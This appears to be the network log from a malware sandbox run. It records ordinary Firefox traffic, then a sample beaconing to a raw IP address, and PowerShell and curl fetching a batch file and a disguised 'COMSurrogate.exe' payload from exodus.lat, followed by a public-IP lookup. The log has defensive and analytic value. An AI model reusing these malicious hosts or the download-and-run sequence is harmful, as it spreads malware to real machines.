                                  GET /desktop/v1/recommendations?locale=en-US&region=GB&count=30 HTTP/2.0
                                  host: firefox-api-proxy.cdn.mozilla.net
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  consumer_key: 94110-6d5ff7a89d72c869766af0e0
                                  if-none-match: W/"48ad-Wzzv6brE9/8oXtHM28V6BRKWozE"
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN AAAA
                                  Response
                                  youtube.com
                                  IN AAAA
                                  2a00:1450:4009:816::200e
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN AAAA
                                  Response
                                  youtube.com
                                  IN AAAA
                                  2a00:1450:4009:816::200e
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  172.210.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.210.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  172.210.232.199.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  172.210.232.199.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  34.160.144.191
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN A
                                  34.160.144.191
                                • flag-us
                                  DNS
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:74e4::
                                • flag-us
                                  DNS
                                  prod.ads.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN A
                                  Response
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.32.237.164
                                  shavar.prod.mozaws.net
                                  IN A
                                  44.226.106.83
                                  shavar.prod.mozaws.net
                                  IN A
                                  52.33.23.190
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:92a9::
                                • flag-us
                                  DNS
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                  prod.content-signature-chains.prod.webservices.mozgcp.net
                                  IN AAAA
                                  2600:1901:0:92a9::
                                • flag-us
                                  DNS
                                  shavar.prod.mozaws.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  shavar.prod.mozaws.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                  Response
                                  www.youtube.com
                                  IN CNAME
                                  youtube-ui.l.google.com
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                  Response
                                  www.youtube.com
                                  IN CNAME
                                  youtube-ui.l.google.com
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.149.100.209
                                • flag-gb
                                  GET
                                  https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                                  host: www.youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-gb
                                  GET
                                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                                  host: consent.youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  cookie: SOCS=CAAaBgiA_ci6Bg
                                  cookie: YSC=oSwVSZ4ICCI
                                  cookie: __Secure-YEC=CgtJa3lEMUFKQ3FKOCjHvcm6BjIKCgJHQhIEGgAgRg%3D%3D
                                  cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgRg%3D%3D
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                  Response
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                  Response
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                • flag-us
                                  DNS
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  Response
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:815::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:823::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:821::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  Response
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:821::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:823::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:815::200e
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  14.213.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s25-in-f14.1e100.net
                                  14.213.58.216.in-addr.arpa
                                  IN PTR
                                  ber01s14-in-f14.1e100.net
                                • flag-us
                                  DNS
                                  firefox-settings-attachments.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN A
                                  Response
                                  firefox-settings-attachments.cdn.mozilla.net
                                  IN CNAME
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  164.237.32.52.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  164.237.32.52.in-addr.arpa
                                  IN PTR
                                  Response
                                  164.237.32.52.in-addr.arpa
                                  IN PTR
                                  ec2-52-32-237-164.us-west-2.compute.amazonaws.com
                                • flag-us
                                  DNS
                                  206.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  206.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f14.1e100.net
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  142.250.200.14
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN AAAA
                                  Response
                                  consent.youtube.com
                                  IN AAAA
                                  2a00:1450:4009:822::200e
                                • flag-us
                                  GET
                                  https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl
                                  firefox.exe
                                  Remote address:
                                  34.117.121.53:443
                                  Request
                                  GET /main-workspace/ms-language-packs/b8aa99dd-b2b6-4312-8c40-d15867393b13.ftl HTTP/2.0
                                  host: firefox-settings-attachments.cdn.mozilla.net
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  te: trailers
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  Response
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.121.53
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  14.200.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  lhr48s29-in-f14.1e100.net
                                • flag-us
                                  DNS
                                  14.200.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  14.200.250.142.in-addr.arpa
                                  IN PTR
                                  lhr48s29-in-f14.1e100.net
                                • flag-us
                                  DNS
                                  227.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s34-in-f3.1e100.net
                                • flag-us
                                  DNS
                                  227.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  227.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s34-in-f3.1e100.net
                                • flag-us
                                  DNS
                                  74.204.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f74.1e100.net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr48s49-in-f10.1e100.net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f10.1e100.net
                                • flag-us
                                  DNS
                                  74.204.58.216.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  Response
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f74.1e100.net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr25s13-in-f10.1e100.net
                                  74.204.58.216.in-addr.arpa
                                  IN PTR
                                  lhr48s49-in-f10.1e100.net
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-gb
                                  GET
                                  https://www.google.com/favicon.ico
                                  firefox.exe
                                  Remote address:
                                  142.250.187.196:443
                                  Request
                                  GET /favicon.ico HTTP/2.0
                                  host: www.google.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: image/avif,image/webp,*/*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  referer: https://consent.youtube.com/
                                  sec-fetch-dest: image
                                  sec-fetch-mode: no-cors
                                  sec-fetch-site: cross-site
                                  te: trailers
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  142.250.187.196
                                • flag-us
                                  DNS
                                  www.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN AAAA
                                  Response
                                  www.google.com
                                  IN AAAA
                                  2a00:1450:4009:81f::2004
                                • flag-us
                                  DNS
                                  195.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f3.1e100.net
                                • flag-us
                                  DNS
                                  195.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  195.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f3.1e100.net
                                • flag-us
                                  DNS
                                  196.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f4.1e100.net
                                • flag-us
                                  DNS
                                  196.187.250.142.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  Response
                                  196.187.250.142.in-addr.arpa
                                  IN PTR
                                  lhr25s33-in-f4.1e100.net
                                • flag-us
                                  DNS
                                  211.38.74.45.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  211.38.74.45.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-nl
                                  GET
                                  http://92.63.197.221/add?substr=mixtwo&s=three&sub=
                                  4fe69191d8.exe
                                  Remote address:
                                  92.63.197.221:80
                                  Request
                                  GET /add?substr=mixtwo&s=three&sub= HTTP/1.1
                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                  User-Agent: 1
                                  Host: 92.63.197.221
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                • flag-us
                                  DNS
                                  221.197.63.92.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  221.197.63.92.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  exodus.lat
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  exodus.lat
                                  IN A
                                  Response
                                  exodus.lat
                                  IN A
                                  203.161.45.11
                                • flag-us
                                  DNS
                                  exodus.lat
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  exodus.lat
                                  IN A
                                  Response
                                  exodus.lat
                                  IN A
                                  203.161.45.11
                                • flag-nl
                                  GET
                                  https://exodus.lat/ss.bat
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /ss.bat HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Thu, 05 Dec 2024 00:35:03 GMT
                                  accept-ranges: bytes
                                  content-length: 6492
                                  date: Fri, 06 Dec 2024 02:17:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-nl
                                  GET
                                  https://exodus.lat/COMSurrogate.exe
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /COMSurrogate.exe HTTP/1.1
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Fri, 29 Nov 2024 20:45:59 GMT
                                  accept-ranges: bytes
                                  content-length: 167936
                                  date: Fri, 06 Dec 2024 02:17:57 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-us
                                  DNS
                                  11.45.161.203.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  Response
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  server700-1.shared.spaceship.host
                                • flag-us
                                  DNS
                                  11.45.161.203.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  Response
                                  11.45.161.203.in-addr.arpa
                                  IN PTR
                                  server700-1.shared.spaceship.host
                                • flag-nl
                                  GET
                                  https://exodus.lat/COMSurrogate.exe
                                  powershell.exe
                                  Remote address:
                                  203.161.45.11:443
                                  Request
                                  GET /COMSurrogate.exe HTTP/1.1
                                  Host: exodus.lat
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  keep-alive: timeout=5, max=100
                                  content-type: application/x-msdownload
                                  last-modified: Fri, 29 Nov 2024 20:45:59 GMT
                                  accept-ranges: bytes
                                  content-length: 167936
                                  date: Fri, 06 Dec 2024 02:17:59 GMT
                                  server: LiteSpeed
                                  x-turbo-charged-by: LiteSpeed
                                • flag-us
                                  DNS
                                  api.ipify.org
                                  curl.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  api.ipify.org
                                  IN A
                                  Response
                                  api.ipify.org
                                  IN A
                                  172.67.74.152
                                  api.ipify.org
                                  IN A
                                  104.26.13.205
                                  api.ipify.org
                                  IN A
                                  104.26.12.205
                                • [US]
                                  GET
                                  https://api.ipify.org/
                                  curl.exe
                                  Remote address:
                                  172.67.74.152:443
                                  Request
                                  GET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:18:00 GMT
                                  Content-Type: text/plain
                                  Content-Length: 14
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8ed8c865cddc9496-LHR
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48454&min_rtt=47181&rtt_var=15569&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3278&recv_bytes=383&delivery_rate=79606&cwnd=253&unsent_bytes=0&cid=739fd754cb65078b&ts=456&x=0"
                                • [US]
                                  DNS
                                  c.pki.goog
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  c.pki.goog
                                  IN A
                                  Response
                                  c.pki.goog
                                  IN CNAME
                                  pki-goog.l.google.com
                                  pki-goog.l.google.com
                                  IN A
                                  142.250.200.35
                                • [GB]
                                  GET
                                  http://c.pki.goog/r/gsr1.crl
                                  Remote address:
                                  142.250.200.35:80
                                  Request
                                  GET /r/gsr1.crl HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  User-Agent: Microsoft-CryptoAPI/10.0
                                  Host: c.pki.goog
                                  Response
                                  HTTP/1.1 200 OK
                                  Accept-Ranges: bytes
                                  Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                  Cross-Origin-Resource-Policy: cross-origin
                                  Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                  Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                  Content-Length: 1739
                                  X-Content-Type-Options: nosniff
                                  Server: sffe
                                  X-XSS-Protection: 0
                                  Date: Fri, 06 Dec 2024 01:39:53 GMT
                                  Expires: Fri, 06 Dec 2024 02:29:53 GMT
                                  Cache-Control: public, max-age=3000
                                  Age: 2286
                                  Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
                                  Content-Type: application/pkix-crl
                                  Vary: Accept-Encoding
